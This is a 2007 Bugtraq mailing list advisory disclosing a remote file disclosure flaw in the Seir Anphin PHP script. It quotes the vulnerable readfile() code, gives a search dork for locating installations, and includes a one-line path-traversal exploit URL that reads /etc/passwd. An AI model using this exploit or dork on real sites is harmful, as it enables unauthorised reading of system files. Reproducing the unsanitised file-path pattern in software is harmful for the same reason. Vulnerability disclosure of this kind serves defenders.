Bugtraq mailing list archives
Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability
From: ilkerkandemir () mynet com
Date: 28 Apr 2007 13:01:59 -0000
---------------------------------------------------------------------------------- AYYILDIZ.ORG PreSents... Script: Seir Anphin Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1 Dork:"Powered by Seir Anphin" Contact: ilker Kandemir <ilkerkandemir[at]mynet.com> info: */Siz Yokken AYYILDIZ Vardi.*/ ----------------------------------------------------------------------------------- Bug: exit(); header("Content-Disposition: attachment; filename=\"$filename\""); header('Content-Length: ' . filesize($a['filepath'])); readfile($a['filepath']); exit(); ----------------------------------------------------------------------------------- Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd ----------------------------------------------------------------------------------- Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke Special Tnx: AYYILDIZ.ORG
Current thread:
- Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability ilkerkandemir (Apr 28)